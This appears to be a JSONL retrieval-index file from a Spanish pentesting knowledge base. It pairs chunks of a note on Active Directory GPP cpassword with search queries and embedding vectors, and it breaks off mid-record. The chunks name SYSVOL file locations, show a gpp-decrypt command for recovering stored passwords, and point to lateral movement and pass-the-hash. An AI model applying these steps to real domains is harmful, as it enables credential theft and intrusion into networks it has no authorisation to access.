"con que herramienta leo archivos Group Policy Preferences antiguos", "v": [-0.10695, 0.03846, 0.0924, -0.34867, 0.04712, -0.1581, -0.02467, -0.12578, -0.01134, -0.09945, 0.02443, -0.06572, 0.01879, 0.02219, 0.07952, 0.0179, 0.10008, -0.12501, 0.02808, -0.01288, -0.10062, 0.11324, -0.10071, -0.15508, 0.01457, -0.1328, 0.02502, -0.00187, -0.14469, 0.13895, -0.07237, 0.07519, -0.00587, -0.01015, -0.04543, -0.03801, 0.04611, 0.04196, 0.05139, 0.03916, 0.00515, 0.00204, -0.12205, 0.06239, 0.02716, -0.00597, -0.14626, 0.01482, -0.0447, -0.02333, 0.05261, -0.16683, -0.03963, 0.05959, 0.02761, 0.02781, 0.06617, -0.0203, 0.00485, -0.05592, -0.19513, 0.06629, -0.096, -0.00424, -0.098, 0.03932, -0.00128, 0.01314, -0.08048, 0.17568, 0.03117, -0.0344, 0.05345, -0.00521, -0.03, -0.02722, 0.08805, -0.00832, -0.02349, 0.03298, 0.02734, -0.0178, -0.03466, -0.00985, -0.01388, -0.10508, 0.03555, 0.11833, -0.00909, -0.02357, -0.01961, -0.05434, 0.01748, -0.02521, 0.0949, -0.00972, -0.00423, 0.01726, 0.0364, -0.08286, 0.09094, -0.02357, 0.02702, 0.09843, 0.04732, 0.02804, -0.0669, 0.03981, -0.02363, -0.05356, 0.08291, -0.01026, 0.0855, 0.11798, 0.05668, 0.12427, -0.028, -0.0203, -0.0553, -0.08359, 0.03081, 0.05149, -0.0459, 0.0055, 0.04568, 0.00342, 0.0337, 0.08453, -0.16427, -0.01156, -0.09008, 0.0423, 0.04049, 0.0619, -0.04027, -0.0203, 0.02143, -0.03543, 0.06229, -0.03694, 0.02867, 0.02484, -0.03251, -0.07927, 0.09163, -0.08378, 0.03142, 0.04554, 0.02349, -0.04499, -0.01047, -0.08063, -0.04449, -0.00154, -0.07354, 0.01926, -0.09599, -0.0946, -0.09497, 0.00747, -0.00598, -0.08016, -0.01357, -0.00351, -0.02, -0.01243, 0.04855, -0.00372, 0.02246, 0.02425, 0.0263, -0.02739, 0.04264, -0.09135, -0.08007, -0.05414, -0.00221, -0.03291, 0.06568, 0.03329, 0.00488, -0.07044, 0.02206, 0.00641, 0.0275, -0.04543, 0.04515, 0.08975, 0.00359, 0.00313, -0.05933, 0.02914, 0.02246, 0.02507, -0.02221, -0.02515, -0.00013, -0.00856, -0.04848, 0.03326, 0.0093, -0.02796, 0.02505, -0.00623, -0.05739, 0.04533, 0.05287, -0.04271, 0.03938, 0.02741, 0.00488, 0.00172, -0.01047, 0.03181, 0.022, 0.0246, -0.00888, 0.02714, 0.04749, 0.06441, -0.0272, 0.03404, 0.08558, -0.00411, -0.01127, -0.01048, 0.03721, 0.00189, 0.00304, -0.02364, 0.02996, -0.01614, -0.02334, 0.02388, 0.06216, -0.04223, 0.04666, -0.07407, -0.05661, 0.00505, 0.00311, 0.00591, 0.04678, 0.06524, -0.05447, -0.0278, 0.01165, -0.02069, 0.00248, -0.02291, 0.05208, -0.00995, -0.00228, 0.00332, 0.03778, -0.06535]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "que programa o herramienta sirve para buscar el valor de cpassword en grupos dentro del sistema de archivos SYSVOL?", "v": [-0.05065, -0.07284, -0.18421, -0.23, -0.03247, -0.2337, -0.03317, -0.13541, 0.03088, -0.0594, -0.11878, -0.13417, 0.04643, -0.0783, 0.08413, 0.08397, 0.10726, -0.15353, -0.11265, 0.09448, -0.03968, -0.06978, -0.06833, -0.08594, -0.10483, 0.06926, -0.01976, -0.04019, -0.10498, 0.11532, -0.03684, -0.02449, 0.0413, -0.15498, -0.07118, -0.08562, 0.01526, 0.11862, -0.03638, 0.00339, -0.03809, 0.02992, -0.07743, 0.04839, 0.03786, -0.09683, 0.00502, 0.06661, 0.0155, -0.0275, -0.03491, -0.07719, -0.10956, 0.0278, 0.01087, -0.15248, 0.00968, -0.09748, -0.05873, -0.04931, -0.16662, 0.07641, -0.09589, -0.03512, 0.0339, 0.00942, 0.07955, 0.0088, -0.09822, 0.10787, -0.02046, -0.05763, 0.04406, -0.0009, -0.03589, 7e-05, 0.04373, 0.05008, 0.01477, -0.08041, 0.03791, -0.00155, -0.05756, 0.05317, -0.00772, -0.05144, 0.12208, 0.03213, 0.03358, -0.06418, 0.01762, 0.06779, 0.03299, 0.11903, 0.04437, -0.06368, 0.05814, -0.00447, -0.01771, 0.01127, 0.09151, -0.08181, -0.08416, 0.11904, -0.01646, 0.07973, 0.02167, 0.05697, 0.00974, -0.02308, 0.09442, 0.0006, 0.06781, 0.03734, -0.02493, -0.0136, -0.02304, 0.00549, 0.03003, -0.02941, -0.0166, 0.08682, -0.11267, -0.0742, 0.04933, 0.00462, 0.02272, 0.08682, -0.01971, 0.04412, 0.03472, 0.01145, -0.06801, 0.00513, -0.05392, -0.11465, 0.03569, -0.02333, -0.00647, -0.0559, 0.02566, 0.04976, 0.00649, -0.09026, 0.09048, 0.02592, 0.05345, -0.03416, -0.029, -0.02485, -0.00798, -0.00649, -0.01815, 0.01992, -0.05831, 0.0054, -0.00858, -0.07271, -0.10847, -0.00564, -0.07633, -0.02148, 0.0005, -0.0474, 0.01663, -0.05487, 0.0237, -0.00109, 0.08326, 0.0201, 0.04516, -0.02777, 0.10908, -0.04789, -0.01198, -0.02397, -0.0382, -0.07358, 0.06263, -0.05651, -0.04405, 0.03056, 0.02813, 0.0117, -0.00175, -0.06268, 0.02008, 0.05853, 0.00588, 0.01911, -0.00184, 0.01587, -0.0208, -0.01501, -0.05057, 0.03294, -0.03728, -0.00916, 0.05619, -0.06959, -0.02499, -0.00668, -0.0365, -0.00533, 0.00738, 0.05704, 0.04649, -0.01993, 0.10081, 0.12105, 0.05492, 0.00701, 0.04377, -0.00121, -0.06653, -0.06182, -0.01624, 0.06777, 0.03256, 0.05815, 0.0037, 0.03112, 0.05581, 0.06067, -0.00235, -0.04267, -0.03432, 0.01658, -0.00252, -0.0306, -0.00139, -0.06333, -0.02386, -0.01817, 0.06044, -0.04997, -0.0065, -0.03559, -0.06711, -0.02594, 0.00766, 0.05851, 0.00854, 0.00554, -0.0651, -0.04, 0.00842, -0.04366, 0.02283, -0.01853, -0.02761, 0.02347, -0.00273, -0.03233, 0.06808, -0.01046]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "con quΓ© puedo acceder al atributo cpassword guardado en los archivos XML de polΓ­ticas y servicios?", "v": [-0.02533, -0.02072, -0.05924, -0.18027, -0.1109, -0.06835, 0.0995, -0.03155, -0.12798, -0.03358, -0.10232, -0.14173, -0.06099, -0.04755, 0.13072, -0.0212, 0.19996, -0.09297, -0.01847, 0.07724, 0.04683, 0.00564, -0.06272, -0.06878, -0.19057, -0.00689, 0.00686, 0.04616, -0.07256, 0.06382, -0.02424, -0.02633, 0.0149, -0.05649, -0.03319, 0.1279, 0.08015, 0.22388, -0.10741, 0.02022, 0.00738, 0.0107, -0.06841, 0.09283, -0.02885, -0.08456, 0.01217, 0.10725, 0.01201, -0.12094, 0.00181, -0.08896, -0.23424, -0.03542, 0.07757, 0.00228, 0.06677, -0.05316, -0.05704, 0.00262, -0.08212, 0.17377, -0.00531, 0.08157, -0.13241, -0.0173, -0.0643, 0.07592, -0.08405, 0.09195, 0.01263, -0.03695, 0.02412, -0.01522, -0.00784, -0.01373, 0.04925, -0.01926, 0.04282, 0.16856, -0.04919, 0.0478, -0.10798, -0.05375, -0.04794, -0.1209, 0.03253, -0.03794, -0.01533, -0.02689, 0.12657, 0.07707, -0.08223, -0.01658, -0.10728, -0.00534, -0.04786, -0.09562, -0.01006, -0.04649, 0.05549, 0.02922, -0.11152, 0.09434, 0.07086, -0.01592, 0.04885, -0.01281, -0.07175, -0.0368, 0.07059, 0.07198, -0.02259, 0.02954, 0.04977, -0.02972, -0.01532, -0.1056, -0.01155, 0.00912, 0.00495, 0.06185, 0.00309, 0.05089, 0.03018, -0.02654, 0.04905, 0.0497, -0.08221, 0.03748, 0.01036, -0.03862, -0.0579, -0.02739, -0.0311, -0.01115, 0.09454, -0.00915, 0.00577, 0.00131, 0.03867, -0.03264, 0.04276, 0.07805, 0.02966, -0.00877, 0.01574, 0.08992, -0.11415, -0.0483, 0.02604, -0.05431, 0.04233, 0.0345, -0.09796, 0.02118, 0.01371, -0.10233, -0.0211, 0.0072, -0.07517, -0.04694, -0.02315, 0.05119, -0.00444, -0.01742, 0.05408, 0.0134, 0.03429, 0.00095, -0.01577, 0.03323, 0.01704, -0.0903, -0.01279, 0.01668, -0.06534, -0.08419, 0.07256, -0.03489, -0.05381, 0.01732, 0.02148, 0.03379, 0.00314, -0.08338, 0.02932, -0.04083, -0.02724, -0.02527, -0.03755, -0.04093, 0.02, 0.026, 0.00443, -0.07464, -0.03024, 0.03654, -0.019, -0.01538, -0.00264, -0.0201, -0.02384, -0.02971, 0.04658, -0.0389, 0.02105, 0.02235, -0.02667, 0.06235, -0.03513, 0.00409, 0.0182, -0.03822, -0.0422, -0.00417, -0.01942, 0.02822, -0.01617, -0.03941, -0.07085, 0.01134, 0.06266, -0.05348, 0.06883, -0.03162, 0.03005, 0.01359, 0.02829, 0.02454, 0.00616, -0.016, -0.05357, 0.04609, 0.09182, -0.01489, -0.03954, -0.04109, -0.02999, -0.05422, 0.02421, 0.06107, -0.02244, -0.02466, -0.01129, -0.06152, -0.02694, 0.06003, 0.01358, -0.01444, 0.00982, 6e-05, -0.01983, 0.02565, 0.02317, -0.02164]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## DΓ³nde buscar\n```\n\\\\DC\\SYSVOL\\\\Policies\\...\\Groups.xml\n```\nBusca el atributo `cpassword` en `Groups.xml` (tambiΓ©n en `Services.xml`, `ScheduledTasks.xml`, `Datasources.xml`).", "indexar": "cual es una alternativa libre para extraer informaciΓ³n confidencial como contraseΓ±as desde Groups.xml?", "v": [0.16773, 0.02667, 0.00645, -0.09554, 0.02698, -0.1728, -0.01111, -0.11901, -0.15692, -0.06419, 0.00434, -0.06767, -0.01908, -0.01964, 0.09512, -0.03946, 0.14191, -0.0629, 0.09021, 0.02964, -0.06876, -0.00178, -0.09853, -0.10235, -0.08524, -0.10423, -0.04656, -0.01066, -0.02789, 0.0317, 0.02379, -0.06381, 0.00878, 0.03513, 0.00173, 0.15216, 0.15456, 0.12246, 0.00286, -0.07466, 0.0733, -0.08024, -0.10786, 0.12398, 0.03911, 0.01087, -0.09714, 0.09945, 0.07253, 0.01151, -0.09739, -0.01895, -0.11837, -0.06199, -0.02544, -0.02666, 0.15591, -0.09549, 0.01623, 0.04719, -0.02562, 0.06874, 0.07216, 0.09783, -0.09501, -0.04309, 0.04399, 0.01081, -0.15507, 0.08177, 0.09927, -0.06274, 0.01487, 0.05411, -0.04918, -0.09802, 0.04766, 0.01303, -0.0576, 0.14661, -0.01262, -0.03743, 0.04862, 0.00655, -0.04941, -0.01545, 0.09009, -0.03476, -0.03191, -0.04126, 0.15137, 0.01991, -0.06767, 0.07623, 0.04624, -0.08728, 0.03635, 0.11501, -0.0908, -0.02029, -0.01143, 0.0917, -0.07859, 0.07532, 0.02009, 0.03419, -0.04237, 0.02806, 0.00476, -0.02745, 0.01074, -0.00243, -0.01084, 0.01986, 0.04052, -0.06913, -0.05777, 0.01337, 0.02605, 0.01001, -0.05649, -0.10545, 0.00125, -0.02385, -0.00515, 0.05494, 0.01565, 0.01429, -0.07174, -0.06293, -0.00555, -0.05813, -0.06142, 0.01731, -0.00132, 0.02413, 0.01828, -0.05453, -0.01698, -0.01938, -0.01074, -0.08347, -0.00405, 0.02316, 0.07375, 0.01049, -0.01855, -0.01852, 0.00183, -0.0269, -0.05859, -0.00323, -0.02714, 0.10295, -0.02735, 0.05149, -0.12048, -0.10452, -0.08142, 0.14676, 0.00674, -0.07496, -0.01579, -0.01104, -0.03096, 0.00378, -0.02821, -0.01978, -0.02622, 0.03951, 0.01724, 0.05616, 0.07446, -0.11846, 0.03864, -0.06939, 0.005, -0.09834, 0.06022, -0.033, -0.00819, -0.00585, -0.00589, -0.00923, 0.01653, -0.05439, 0.08136, 0.02206, -0.00333, -0.01516, -0.0757, 0.05504, -0.07967, 0.01016, -0.01968, -0.03464, -0.0327, -0.08487, -0.00408, -0.04997, -0.01349, 0.011, -0.03253, -0.02274, -0.02256, 0.02986, -0.03038, -0.04928, -0.04294, 0.02239, 0.09116, 0.02348, 0.03819, -0.01806, -0.14438, -0.00781, -0.01191, -0.02227, -0.03953, 0.04119, -0.00453, 0.05409, 0.12767, -0.00947, 0.03024, -0.02928, 0.05214, 0.0719, 0.00276, -0.02295, 0.03726, 0.07194, -0.02817, 0.00372, 0.11332, 0.00217, -0.03466, -0.02006, 0.00093, -0.045, 0.03972, 0.03899, -0.00075, -0.03345, -0.02406, -0.03443, -0.10436, 0.04408, 0.0122, -0.07029, -0.05431, 0.00942, 0.00804, 0.00438, 0.042, -0.03639]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "cual es una alternativa libre a gpp-decrypt?", "v": [-0.09397, -0.02851, -0.09318, 0.05959, 0.00377, -0.14018, -0.0241, 0.05946, -0.20715, -0.07416, 0.01934, -0.13741, -0.04659, 0.05233, 0.08502, -0.11284, -0.02209, -0.13465, 0.09567, 0.05941, -0.06463, -0.05591, -0.06676, -0.21576, -0.05931, -0.06713, -0.02988, 0.12132, -0.06699, 0.05592, 0.02914, -0.01441, 0.00378, -0.00133, -0.01936, 0.11523, 0.15969, 0.06016, 0.06993, 0.02033, 0.06533, -0.12508, -0.03021, 0.1035, -0.06388, -0.04443, -0.06535, 0.10217, 0.01869, 0.04555, -0.16547, -0.02356, -0.05475, -0.01428, -0.00416, 0.00951, 0.06851, -0.12467, -0.04562, -0.03248, -0.09668, 0.08613, 0.09316, -0.02934, -0.01036, -0.04264, -0.07097, 0.03817, -0.11241, 0.11758, 0.10388, 0.00111, -0.02506, 0.05149, -0.08681, 0.05318, -0.08856, -0.06034, -0.02352, 0.08087, 0.05439, -0.10327, 0.00068, 0.07434, -0.10859, -0.09325, 0.08566, -0.00335, -0.02821, 0.05326, 0.04714, 0.07091, 0.00229, 0.18648, -0.03796, -0.12095, -0.01733, 0.06389, -0.02224, 0.06706, 0.08182, 0.03555, -0.10056, -0.00831, 0.04216, -0.02118, -0.03298, 0.07502, -0.01669, -0.03857, 0.06164, 0.08547, -0.03458, 0.02472, 0.00049, -0.07952, -0.06135, 0.0393, 0.02309, -0.01753, -0.06764, -0.04123, -0.12068, -0.00087, 0.03232, 0.09518, -0.01064, 0.02731, -0.05071, 0.04272, 0.04917, -0.01816, -0.07903, -0.06305, -0.06912, -0.03638, 0.06228, -0.01355, -0.00854, 0.03052, 0.03271, 0.00256, 0.02195, -0.00963, 0.06977, -0.03736, 0.00964, -0.05862, -0.01464, 0.02202, -0.04366, 0.04218, -0.02916, 0.10207, -0.01547, 0.01496, -0.05375, -0.07281, -0.09347, 0.11945, -0.00668, -0.01402, -0.0035, 0.04041, -0.05535, -0.02844, 0.07233, -0.00952, -0.09046, -0.05272, -0.01876, 0.08232, 0.08336, -0.07081, 0.03234, -0.0925, -0.01295, -0.1021, 0.0386, -0.08891, 0.03727, 0.05669, -0.10181, 0.02916, 0.03076, -0.0436, -0.00316, -0.02181, 0.02275, 0.02443, -0.02939, -0.00722, -0.08438, -0.05189, -0.04658, 0.00382, -0.01997, -0.07402, -0.01736, -0.04561, -0.00109, -0.00045, -0.02818, 0.00365, -0.03812, 0.00858, -0.04854, 0.02353, -0.01468, 0.03898, 0.07633, -0.03716, 0.07754, -0.00582, -0.02923, -0.01603, 0.00048, 0.02994, -0.01839, 0.00028, 0.05216, 0.02558, 0.03452, -0.00225, -0.00937, 0.04181, 0.0206, 0.03636, -0.05234, -0.03365, 0.01024, 0.06523, -0.01092, 0.0349, 0.04711, 0.01803, -0.05396, 0.04236, -0.01043, -0.0621, 0.01929, 0.06214, -0.03288, -0.04805, -0.03465, 0.04138, -0.06159, 0.0032, -0.038, -0.03953, -0.03211, 0.05425, 0.02255, -0.03544, 0.00836, -0.00052]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "que programa puedo usar para acceder a sysvol mediante smb?", "v": [-0.0051, -0.0261, -0.21708, -0.07835, -0.01023, -0.13895, -0.18316, -0.2656, -0.15744, 0.01704, -0.17934, 0.06827, 0.08664, -0.14441, -0.11179, 0.08508, -0.02116, -0.13589, -0.0765, 0.09308, 0.13602, 0.00027, 0.01645, -0.00638, 0.00317, 0.1441, -0.00197, -0.07481, -0.02298, -0.10641, -0.01051, -0.00482, 0.06937, -0.09491, 0.02444, -0.11709, -0.00789, 0.0371, 0.0753, 0.00817, 0.00542, -0.08887, -0.0111, 0.02763, 0.06601, -0.01617, 0.04234, -0.05557, -0.06759, -0.06962, -0.07259, -0.0095, -0.13695, -0.03933, -0.00277, -0.09093, 0.03578, -0.13057, -0.09028, 0.05163, -0.03006, 0.05273, 0.03385, -0.01856, 0.00444, -0.12924, 0.1063, -0.00561, -0.07956, 0.08797, -0.07497, 0.02307, 0.06915, -0.02949, 0.02309, 0.01357, -0.09413, -0.01722, 0.11857, -0.05045, -0.00553, -0.05406, -0.02097, 0.04596, -0.07988, -0.10703, 0.11715, -0.06328, 0.01887, -0.10442, 0.04825, 0.06177, 0.03304, 0.03619, -0.01386, -0.0608, 0.0367, 0.04683, 0.08867, 0.00429, 0.08655, -0.06058, -0.06072, 0.15687, -0.08518, -0.01396, 0.09552, -0.03709, 0.01567, 0.04018, -0.01064, -0.01027, -0.03488, -0.05198, -0.07945, -0.01148, -0.03079, -0.06111, -0.02547, -0.11811, -0.076, -0.02932, 0.00189, -0.00398, 0.02856, 0.00621, 0.03623, 0.12473, -0.11013, 0.07026, -0.03243, -0.00497, 0.03242, -0.05656, -0.0495, -0.08897, -0.01161, -0.02938, 0.0004, -0.02514, -0.01724, 0.07667, 0.00752, 0.00757, 0.01811, 0.00849, -0.02829, -0.08842, -0.01066, -0.00067, 0.06049, 0.0191, -0.02955, 0.04433, -0.04013, -0.00643, 0.02611, -0.01889, -0.07548, 0.032, -0.07989, -0.01087, -0.04279, -0.01074, 0.03017, -0.08023, 0.01205, -0.05723, 0.04459, 0.08764, -0.04031, 0.06232, 0.04113, -0.07437, 0.05184, -0.04787, -0.0326, -0.02749, 0.00014, -0.00202, -0.08529, 0.01701, 0.01291, 0.00362, -0.00592, -0.06689, 0.02202, 0.03939, 0.00057, 0.01829, -0.03941, 0.03946, -0.01304, 0.00685, 0.0141, 0.00126, -0.05298, 0.00479, 0.02708, -0.03713, -0.00398, 0.01062, -0.04712, -0.05175, 0.06923, 0.0907, -0.04059, 0.04127, 0.01559, 0.0579, 0.06567, -0.03195, 0.04754, -0.00693, 0.0157, -0.03942, -0.00354, 0.0536, 0.02921, -0.00222, 0.01903, 0.01528, 0.03961, 0.03795, 0.02021, -0.05818, 0.02177, -0.0045, 0.02273, 0.0123, -0.04917, -0.01058, -0.03449, -0.03839, 0.01716, -0.01445, -0.0112, 0.01645, 0.00563, -0.03708, -0.02749, 0.06105, -0.02881, -0.0435, -0.04396, -0.00318, -0.08217, -0.01714, 0.00276, 0.00305, -0.00425, -0.03038, -0.00172, -0.10036, 0.01902, 0.03354]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "con que herramienta descifro el contenido de los archivos de password?", "v": [-0.01039, -0.07395, -0.05205, -0.23053, -0.04071, -0.11986, -0.04628, -0.06471, -0.03092, -0.05034, -0.08115, -0.03012, 0.01746, -0.03268, 0.03512, 0.01922, 0.14679, -0.08128, -0.00727, 0.08237, -0.06021, 0.00509, -0.06516, -0.03519, -0.06804, -0.08931, 0.09016, 0.09276, -0.19231, 0.05679, 0.02867, -0.03124, 0.0767, 0.00415, -0.06353, 0.06639, 0.06666, 0.08909, -0.10157, 0.15429, -0.00225, 0.04832, -0.09297, 0.10959, -0.03649, 0.01919, -0.03873, 0.03091, 0.12383, 0.08564, -0.02996, -0.23738, -0.03157, 0.00354, -0.04947, -0.14999, 0.06669, -0.10283, 0.02256, -0.0616, -0.14252, 0.07117, -0.02833, 0.00832, -0.14827, -0.08621, 0.02376, 0.00096, -0.07817, 0.17355, 0.06009, -0.04556, -0.07189, -0.0165, -0.02891, 0.02995, 0.03004, 0.03626, -0.03859, 0.02357, 0.01027, -0.03898, 0.02446, -0.0341, -0.1445, -0.08273, 0.06229, 0.01014, 0.03853, -0.02942, 0.01344, 0.02867, -0.0075, 0.01042, 0.01357, -0.06078, 0.05628, -0.05227, -0.06291, -0.09011, 0.04822, 0.01278, -0.00266, 0.08839, 0.04201, 0.02451, -0.02436, 0.04487, -0.04017, -0.06881, 0.09797, -0.01177, 0.07223, -0.03286, -0.05926, 0.04587, -0.04388, -0.11592, 0.06925, -0.04917, 0.01491, 0.04711, -0.0371, -0.05296, 0.02149, 0.02016, 0.00817, 0.07674, -0.11032, -0.08238, 0.05623, 0.00558, -0.10201, 0.08737, -0.06141, -0.01796, 0.02772, -0.09336, -0.09878, -0.0515, 0.00802, -0.01645, -0.00329, 0.01709, 0.11786, 0.01948, 0.02425, -0.02063, -0.10681, -0.02808, -0.02389, -0.08962, 0.00647, -0.03546, -0.05064, 0.06015, -0.03403, -0.05006, -0.0684, 0.02005, -0.09986, -0.07368, -0.03289, 0.03812, -0.08514, -0.1171, 0.05341, -0.00214, 0.05858, -0.0205, 0.03594, 0.08128, 0.06299, 0.01944, -0.03891, -0.01144, -0.0508, -0.06766, 0.01633, -0.09462, -0.04217, -0.04871, -0.00704, -0.03591, 0.00311, -0.07437, 0.06398, -0.06859, -0.01987, 0.01843, -0.02613, 0.01653, -0.05524, 0.01581, -0.04816, -0.01989, -0.06066, -0.0238, 0.04997, -0.00083, 0.0172, -0.03107, -0.01725, -0.03802, 0.01539, 0.05442, -0.02525, -0.03548, -0.02812, -0.0166, 0.01547, -0.01404, 0.0515, -0.03915, -0.02507, -0.01054, -0.00116, 0.08677, -0.07828, -0.01059, 0.08127, 0.03971, 0.06483, -0.0162, -0.01374, -0.01554, -0.02635, 0.06344, 0.01195, -0.05538, -0.01068, 0.03261, -0.06976, 0.01989, 0.1071, -0.04167, -0.01313, -0.03628, -0.06275, -0.02972, -0.02534, 0.06175, 0.032, -0.04665, -0.04819, -0.00643, 0.00471, -0.00923, 0.00042, -0.03981, -0.02628, 0.00398, 0.00806, -0.0437, 0.04001, -0.06106]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "que programa sirve para hacer movimiento lateral con credenciales en claro?", "v": [-0.09546, 0.0501, -0.21791, -0.15968, -0.07552, -0.16569, -0.01392, 0.11221, -0.0404, -0.14321, -0.00462, -0.01871, -0.01869, -0.09384, 0.0795, 0.07864, 0.06448, -0.02359, 0.05125, 0.01077, -0.10526, -0.07036, -0.00428, -0.14608, 0.05418, 0.02433, -7e-05, -0.01647, -0.01926, 0.01679, -0.0636, 0.07593, 0.08052, -0.09533, 0.09215, -0.01527, -0.03829, 0.0365, -0.03266, 0.12666, -0.09568, -0.01004, -0.04588, -0.00433, 0.01796, 0.03109, 0.01393, 0.04103, -0.09776, -0.01255, 0.06088, 0.05658, 0.02227, -0.10365, 0.02911, -0.03477, 0.00179, -0.15025, -0.10662, -0.11415, 0.0317, 0.04546, 0.04104, -0.03674, 0.00937, -0.04573, 0.06016, -0.08306, -0.04809, -0.04754, -0.06568, 0.01744, 0.00293, 0.06881, -0.10466, 0.06133, 0.00329, -0.04783, 0.03471, 0.01827, -0.00424, 0.07165, 0.00404, 0.03818, -0.01819, -0.03779, -0.0212, -0.03635, 0.0207, 0.08275, 0.07972, 0.18212, -0.05534, 0.09053, 0.04881, 0.07073, -0.05072, 0.03185, -0.03165, 0.029, 0.11317, -0.09584, -0.12176, -0.01294, -0.0068, -0.00042, 0.12206, 0.00734, -0.08726, 0.10319, 0.10426, 0.01138, -0.06661, -0.01096, -0.03718, 0.05832, -0.13443, -0.00646, 0.00295, 0.06456, 0.03018, -0.06128, -0.06205, -0.085, 0.00841, 0.02961, -0.07641, 0.07283, -0.11024, 0.06202, 0.06459, -0.00476, -0.02646, -0.02365, -0.07787, -0.12719, 0.07135, 0.05762, 0.06202, -0.01115, 0.08658, 0.04264, 0.00983, -0.00654, -0.02442, 0.04685, 0.10808, -0.03858, 0.03889, 0.03214, -0.00153, 0.06124, 0.00411, 0.01543, -0.03736, -0.00612, 0.01079, -0.02545, -0.1181, 0.04021, -0.04364, 0.04754, -0.04304, -0.05376, 0.04082, -0.09572, -0.0135, 0.03762, 0.07555, 0.09826, -0.03408, 0.03741, 0.02643, -0.06284, 0.0557, 0.07214, -0.03064, -0.05125, 0.05812, -0.0126, -0.03397, 0.06285, 0.07963, 0.01412, 0.06289, -0.01216, -0.02319, 0.04407, 0.03938, 0.05598, -0.01405, 0.00063, -0.01335, -0.01207, -0.01536, -0.0149, -0.00186, -0.01221, 0.06816, 0.01728, -0.09922, -0.02853, 0.06612, 0.02765, 0.05772, 0.13661, 0.00095, 0.05134, 0.09773, 0.10959, -0.01587, -0.06657, 0.12304, 0.04108, -0.08898, -0.01622, -0.02361, 0.05739, -0.01462, 0.04901, 0.02119, -0.05527, -0.01939, 0.0542, 0.03414, -0.06027, 0.06025, 0.00422, -0.03647, 0.03457, 0.04454, 0.00616, -0.01479, -0.04578, 0.01409, -0.0065, 0.0564, 0.01141, -0.04947, -0.07438, -0.07008, -0.01284, -0.03469, -0.00209, -0.01817, 0.00369, -0.03612, 0.04378, 0.04966, 0.00299, -0.00788, 0.00574, 0.03091, -0.05215, 0.1058, 0.0656]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "cual es una tecnica para realizar pass-the-hash?", "v": [0.02079, -0.07912, -0.13393, -0.01206, 0.04992, -0.14459, -0.03352, -0.00279, -0.0215, 0.14527, -0.11661, 0.05146, -0.02977, 0.07378, 0.15138, 0.05931, 0.09053, 0.01428, 0.05061, 0.0311, -0.09484, 0.00879, -0.16755, 0.02355, -0.01828, -0.0772, -0.02422, -0.00502, -0.35588, -0.09102, 0.04129, -0.00152, -0.05174, 0.03014, -0.00032, 0.09867, 0.00823, 0.11615, 0.0552, 0.10861, -0.12335, 0.03737, -0.10696, 0.09399, 0.08397, -0.18739, 0.08926, 0.0637, 0.02256, -0.06179, 0.10273, 0.10447, -0.15421, -0.00717, -0.01214, -0.15097, 0.11363, 0.01561, -0.12028, -0.06259, -0.01426, -0.00774, 0.04849, 0.054, 0.02043, -0.11185, 0.00834, -0.08643, -0.02436, 0.04508, 0.07449, 0.11625, 0.00505, 0.05759, -0.0858, 0.06795, -0.05687, -0.00078, 0.07494, -0.03586, 0.02077, 0.01502, -0.04717, -0.03333, -0.08712, -0.0548, 0.05829, -0.08312, 0.07884, -0.00529, 0.00071, 0.02619, 0.07544, -0.04803, -0.0015, -0.00764, -0.02312, 0.01373, -0.06292, -0.0489, -0.01936, -0.02612, -0.13133, 0.14131, -0.03341, 0.02968, 0.05341, 0.00278, 0.00776, 0.00384, 0.03325, 0.03425, -0.05943, 0.03262, -0.0202, -0.0414, -0.04496, -0.03837, -0.0622, 0.01255, -0.03401, 0.0479, 0.04215, -0.02622, 0.0807, -0.02638, -0.00584, 0.05844, -0.02078, 0.02613, 0.01292, 0.03828, -0.09835, -0.00517, -0.01651, 